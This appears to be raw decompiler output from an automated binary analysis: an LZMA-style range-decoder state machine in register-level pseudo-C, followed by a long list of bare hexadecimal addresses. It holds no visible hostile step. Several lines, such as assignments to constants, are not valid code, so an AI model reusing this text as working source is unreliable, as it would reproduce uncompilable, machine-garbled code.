							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                  0x00000000
                                                  0x00406520
                                                  0x00406520
                                                  0x00406524
                                                  0x004065db
                                                  0x004065de
                                                  0x004065ea
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x00406891
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x00000000
                                                  0x004068b3
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x00406534
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00000000
                                                  0x00406a6b
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406582
                                                  0x00406582
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00000000
                                                  0x0040683d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x00000000
                                                  0x004069b0
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
